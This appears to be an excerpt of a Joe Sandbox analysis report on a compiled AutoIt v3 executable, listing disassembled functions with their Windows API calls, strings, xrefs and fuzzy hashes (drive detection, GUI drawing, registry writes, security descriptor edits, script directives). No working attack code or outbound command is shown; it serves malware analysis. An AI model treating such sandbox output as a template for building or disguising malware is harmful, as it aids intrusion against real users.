GetDriveTypeW.KERNEL32(?,0086CB68,?,\\.\,0086CC08), ref: 00844BCA
SetErrorMode.KERNEL32(00000000,0086CB68,?,\\.\,0086CC08), ref: 00844D36

Strings

SAS, xrefs: 00844CC9
SCSI, xrefs: 00844C8A
SSA, xrefs: 00844CA6
SSD, xrefs: 00844C4A
CDROM, xrefs: 00844BFB
Fibre, xrefs: 00844CAD
USB, xrefs: 00844CB4
ATAPI, xrefs: 00844C91
RAMDisk, xrefs: 00844BF4
MMC, xrefs: 00844CDE
PhysicalDrive, xrefs: 00844B76
Virtual, xrefs: 00844CE5
ATA, xrefs: 00844C98
FileBackedVirtual, xrefs: 00844CEC
\\.\, xrefs: 00844B3F
Fixed, xrefs: 00844C09
RAID, xrefs: 00844CBB
Removable, xrefs: 00844C10, 00844C15
Unknown, xrefs: 00844BED, 00844C83
Network, xrefs: 00844C02
SATA, xrefs: 00844CD0
iSCSI, xrefs: 00844CC2
1394, xrefs: 00844C9F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 4bb8f83244a56004af4515314e345e7d5817e33cb78c994a9970dc33e3d8ff12
Instruction ID: 19392841a8517a64945fab353e8c5123469cba3d6bdbaf89b2d0c028c4d9688f
Opcode Fuzzy Hash: 4bb8f83244a56004af4515314e345e7d5817e33cb78c994a9970dc33e3d8ff12
Instruction Fuzzy Hash: 1B619F3060520DDBCF04EB64CAC6A68B7B0FB44349B285016F816EB791EB3ADD51DB91

Function 008673E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00867421
SetTextColor.GDI32(?,?), ref: 00867425
GetSysColorBrush.USER32(0000000F), ref: 0086743B
GetSysColor.USER32(0000000F), ref: 00867446
CreateSolidBrush.GDI32(?), ref: 0086744B
GetSysColor.USER32(00000011), ref: 00867463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00867471
SelectObject.GDI32(?,00000000), ref: 00867482
SetBkColor.GDI32(?,00000000), ref: 0086748B
SelectObject.GDI32(?,?), ref: 00867498
InflateRect.USER32(?,000000FF,000000FF), ref: 008674B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008674CE
GetWindowLongW.USER32(00000000,000000F0), ref: 008674DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00867554
InflateRect.USER32(?,000000FD,000000FD), ref: 00867572
DrawFocusRect.USER32(?,?), ref: 0086757D
GetSysColor.USER32(00000011), ref: 0086758E
SetTextColor.GDI32(?,00000000), ref: 00867596
DrawTextW.USER32(?,008670F5,000000FF,?,00000000), ref: 008675A8
SelectObject.GDI32(?,?), ref: 008675BF
DeleteObject.GDI32(?), ref: 008675CA
SelectObject.GDI32(?,?), ref: 008675D0
DeleteObject.GDI32(?), ref: 008675D5
SetTextColor.GDI32(?,?), ref: 008675DB
SetBkColor.GDI32(?,?), ref: 008675E5

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: ccc28f03058f2d656e6bbdfc8e4b12af4be71a672888696a6f4852b13d3e165c
Instruction ID: 588a844755e157a4a807ef1de61b3f1084057148cada31f78b06a3410d24cd0c
Opcode Fuzzy Hash: ccc28f03058f2d656e6bbdfc8e4b12af4be71a672888696a6f4852b13d3e165c
Instruction Fuzzy Hash: 69616D72900218AFDF019FA4DC49EAE7FB9FF09320F125125F915AB2A1D7B49940CF90

Function 00860FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00861128
GetDesktopWindow.USER32 ref: 0086113D
GetWindowRect.USER32(00000000), ref: 00861144
GetWindowLongW.USER32(?,000000F0), ref: 00861199
DestroyWindow.USER32(?), ref: 008611B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008611ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0086121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00861232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00861245
IsWindowVisible.USER32(00000000), ref: 008612A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008612BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008612D0
GetWindowRect.USER32(00000000,?), ref: 008612E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0086130E
GetMonitorInfoW.USER32(00000000,?), ref: 00861328
CopyRect.USER32(?,?), ref: 0086133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 008613AA

Strings

(, xrefs: 0086131B
tooltips_class32, xrefs: 008611E6
0, xrefs: 008610D3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: ec530ec54d4356abe326d81ffa0437541ff2cb522ca672665d553ae975316a28
Instruction ID: 438e3b7692495e6ad3d20a5238795bcfd3d8c43812a2a0ba24553beaafb08e4f
Opcode Fuzzy Hash: ec530ec54d4356abe326d81ffa0437541ff2cb522ca672665d553ae975316a28
Instruction Fuzzy Hash: DFB18A71604341AFDB00DF64C988B6ABBE4FF88344F05891DF99ADB262C771E844CB92

Function 00860241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008602E5
_wcslen.LIBCMT ref: 0086031F
_wcslen.LIBCMT ref: 00860389
_wcslen.LIBCMT ref: 008603F1
_wcslen.LIBCMT ref: 00860475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008604C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00860504

Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD

Part of subcall function 0083223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00832258
Part of subcall function 0083223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0083228A

Strings

SELECTALL, xrefs: 00860515
SELECTCLEAR, xrefs: 0086052D
DESELECT, xrefs: 0086059C
FINDITEM, xrefs: 00860627
GETSUBITEMCOUNT, xrefs: 00860384, 0086039F
ISSELECTED, xrefs: 008604DD
GETITEMCOUNT, xrefs: 00860316, 00860337
GETSELECTED, xrefs: 008605E1
SELECTINVERT, xrefs: 0086057E
SELECT, xrefs: 00860548
VIEWCHANGE, xrefs: 00860675
GETTEXT, xrefs: 008603EC, 00860407
GETSELECTEDCOUNT, xrefs: 00860470, 0086048B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 64b62746c40c617093bfe97784c0e9e9be5182ce8e938e9bffbbb6aec9317bfe
Instruction ID: 7242359d4a44c6c01ff2d7a6ba7133c5aca20bf353c32f2c47b602f777271d06
Opcode Fuzzy Hash: 64b62746c40c617093bfe97784c0e9e9be5182ce8e938e9bffbbb6aec9317bfe
Instruction Fuzzy Hash: CBE19C31218201CBCB14EF24C55592BB3E6FF98318B16495DF896EB3A2DB34ED45CB86

Function 007E8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007E8968
GetSystemMetrics.USER32(00000007), ref: 007E8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007E899B
GetSystemMetrics.USER32(00000008), ref: 007E89A3
GetSystemMetrics.USER32(00000004), ref: 007E89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007E89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007E89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007E8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007E8A3C
GetClientRect.USER32(00000000,000000FF), ref: 007E8A5A
GetStockObject.GDI32(00000011), ref: 007E8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 007E8A81

Part of subcall function 007E912D: GetCursorPos.USER32(?), ref: 007E9141
Part of subcall function 007E912D: ScreenToClient.USER32(00000000,?), ref: 007E915E
Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000001), ref: 007E9183
Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000002), ref: 007E919D

SetTimer.USER32(00000000,00000000,00000028,007E90FC), ref: 007E8AA8

Strings

AutoIt v3 GUI, xrefs: 007E8A20

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 0c31a4c0cd6661489ac1b8aa36d9773a8222f49fb842aedc1c9c3ce22723588a
Instruction ID: 6df72e99b78c4fcf9bc208b9dcd2fcc11dbf7fefa233aa3a00405dbf3040b2d3
Opcode Fuzzy Hash: 0c31a4c0cd6661489ac1b8aa36d9773a8222f49fb842aedc1c9c3ce22723588a
Instruction Fuzzy Hash: EDB18A75A0024ADFDF14DFA8DC49BAE7BB4FB48314F118229FA15E7290DB78A850CB51

Function 00830D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
Part of subcall function 008310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
Part of subcall function 008310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
Part of subcall function 008310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00830E29
GetLengthSid.ADVAPI32(?), ref: 00830E40
GetAce.ADVAPI32(?,00000000,?), ref: 00830E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830E96
GetLengthSid.ADVAPI32(?), ref: 00830EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00830EB5
HeapAlloc.KERNEL32(00000000), ref: 00830EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00830EDD
CopySid.ADVAPI32(00000000), ref: 00830EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00830F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F6E
HeapFree.KERNEL32(00000000), ref: 00830F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F7E
HeapFree.KERNEL32(00000000), ref: 00830F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F8E
HeapFree.KERNEL32(00000000), ref: 00830F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00830FA1
HeapFree.KERNEL32(00000000), ref: 00830FA8

Part of subcall function 00831193: GetProcessHeap.KERNEL32(00000008,00830BB1,?,00000000,?,00830BB1,?), ref: 008311A1
Part of subcall function 00831193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00830BB1,?), ref: 008311A8
Part of subcall function 00831193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00830BB1,?), ref: 008311B7

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 45bfac92e8d2915ed59ab8ca4e911868e3ae0c3875ebd54a7c72464756ff2daa
Instruction ID: 0e07e549932769c2509471493747a8e80269551eee3b76a76875450fabcead26
Opcode Fuzzy Hash: 45bfac92e8d2915ed59ab8ca4e911868e3ae0c3875ebd54a7c72464756ff2daa
Instruction Fuzzy Hash: 5C715B7290420AEBDF209FA4DC48FAEBBB8FF45700F054115FA99E6191DB719905CFA0

Function 0085C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0086CC08,00000000,?,00000000,?,?), ref: 0085C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0085C5A4
_wcslen.LIBCMT ref: 0085C5F4
_wcslen.LIBCMT ref: 0085C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0085C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0085C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0085C84D
RegCloseKey.ADVAPI32(?), ref: 0085C881
RegCloseKey.ADVAPI32(00000000), ref: 0085C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0085C960

Strings

REG_DWORD, xrefs: 0085C804
REG_SZ, xrefs: 0085C644
REG_EXPAND_SZ, xrefs: 0085C5CD
REG_MULTI_SZ, xrefs: 0085C6F5
REG_QWORD, xrefs: 0085C8C3
REG_BINARY, xrefs: 0085C913

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 6e0548e5e49221e8e7053f03f7739ad0114c9dbde52a3944a5143bc5fc5ad1b5
Instruction ID: 9b1bb5b6851c130945dbcde97a158905d0ccbc86c0395fef9d06bfdc838419fa
Opcode Fuzzy Hash: 6e0548e5e49221e8e7053f03f7739ad0114c9dbde52a3944a5143bc5fc5ad1b5
Instruction Fuzzy Hash: D9124535604201DFCB14DF14C885A2AB7E5FF88715F08889DF88A9B3A2DB35ED45CB92

Function 0086091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008609C6
_wcslen.LIBCMT ref: 00860A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00860A54
_wcslen.LIBCMT ref: 00860A8A
_wcslen.LIBCMT ref: 00860B06
_wcslen.LIBCMT ref: 00860B81

Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD

Part of subcall function 00832BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00832BFA

Strings

COLLAPSE, xrefs: 00860B01, 00860B1C
GETITEMCOUNT, xrefs: 00860C1E
GETSELECTED, xrefs: 00860C4E
CHECK, xrefs: 00860A85, 00860AA0
ISCHECKED, xrefs: 00860CE1
SELECT, xrefs: 00860D11
GETTOTALCOUNT, xrefs: 008609F2, 00860A17
EXISTS, xrefs: 00860B7C, 00860B97
EXPAND, xrefs: 00860BF8
UNCHECK, xrefs: 00860D3E
GETTEXT, xrefs: 00860C97

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: eb81fd6babac40b287e96e1b06bcf391e9517c635e648575f9862feb062ed311
Instruction ID: 2a50f21a4a0dbd202ffde777a878fb39d70d79c01d732e731aaba6a9d565f497
Opcode Fuzzy Hash: eb81fd6babac40b287e96e1b06bcf391e9517c635e648575f9862feb062ed311
Instruction Fuzzy Hash: 22E17A31208301DFCB14EF68C45092AB7E2FF98358B168A5DF8969B362D735ED45CB86

Function 0085C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
_wcslen.LIBCMT ref: 0085C9F1
_wcslen.LIBCMT ref: 0085CA68
_wcslen.LIBCMT ref: 0085CA9E
_wcslen.LIBCMT ref: 0085CAF9
_wcslen.LIBCMT ref: 0085CB2F
_wcslen.LIBCMT ref: 0085CB7F

Strings

HKCU, xrefs: 0085CBCE
HKEY_CURRENT_USER, xrefs: 0085CBBD
HKEY_USERS, xrefs: 0085CBDF
HKCC, xrefs: 0085CBAC
HKLM, xrefs: 0085CA98, 0085CA9D
HKEY_CURRENT_CONFIG, xrefs: 0085CB79, 0085CB7E
HKEY_CLASSES_ROOT, xrefs: 0085CAF3, 0085CAF8
HKCR, xrefs: 0085CB29, 0085CB2E
HKEY_LOCAL_MACHINE, xrefs: 0085CA62, 0085CA67
HKU, xrefs: 0085CBF0

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 6a5acea7056316aa4cbb525f7115632bd4b0ec3594b496089b0a8cfb2725905b
Instruction ID: a4d4675c57d038ece6de169e8692a0d1af8a03d6da9883c3d0b7b4123adc3a54
Opcode Fuzzy Hash: 6a5acea7056316aa4cbb525f7115632bd4b0ec3594b496089b0a8cfb2725905b
Instruction Fuzzy Hash: 5671047260022A8FCF20DE68CD415BF37A1FBA0766B150128FC66E7284E634DD4CCBA1

Function 0086833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0086835A
_wcslen.LIBCMT ref: 0086836E
_wcslen.LIBCMT ref: 00868391
_wcslen.LIBCMT ref: 008683B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008683F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00865BF2), ref: 0086844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00868487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008684CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00868501
FreeLibrary.KERNEL32(?), ref: 0086850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0086851D
DestroyIcon.USER32(?,?,?,?,?,00865BF2), ref: 0086852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00868549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00868555

Strings

.dll, xrefs: 008683AB
.exe, xrefs: 00868388
.icl, xrefs: 00868368

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: e0c055d074c66995dad940fb43eead7b1a611c54759728f7919680416d2bbe10
Instruction ID: 86043e3be8e7e87a4af397cc2e6c70f078170b8ad60330f42571df23038ce5e5
Opcode Fuzzy Hash: e0c055d074c66995dad940fb43eead7b1a611c54759728f7919680416d2bbe10
Instruction Fuzzy Hash: FA61BF71540219FAEB14DF64CC49BBF77A8FB04B11F11460AF91AE62D1DFB4AA50CBA0

Function 007D7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

', xrefs: 00815169
Unterminated group of comments, xrefs: 0081528C
#comments-start, xrefs: 007D785F, 007D78B1
Bad directive syntax error, xrefs: 0081519A
#pragma compile, xrefs: 007D77D3
", xrefs: 00815153
#include-once, xrefs: 007D782F
#OnAutoItStartRegister, xrefs: 007D7817
#comments-end, xrefs: 007D78D9
#notrayicon, xrefs: 007D77E7
#requireadmin, xrefs: 007D77FF
#ce, xrefs: 007D78ED
Cannot parse #include, xrefs: 00815279
#cs, xrefs: 007D7873, 007D78C5
#include, xrefs: 007D7847

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: fff95d8250cb925244151b1bd0a10e1d87c6bf12b6a6e45e9e2a4325b0381818
Instruction ID: 5e1f97a3854ad6b66953b6b736bfb6189910fba871101a4207fa6aa63b700350
Opcode Fuzzy Hash: fff95d8250cb925244151b1bd0a10e1d87c6bf12b6a6e45e9e2a4325b0381818
Instruction Fuzzy Hash: 5181DF71604605FADB25AF60DC46FAA37B8FF54300F044426FA19AA392FB78DA51C6A1

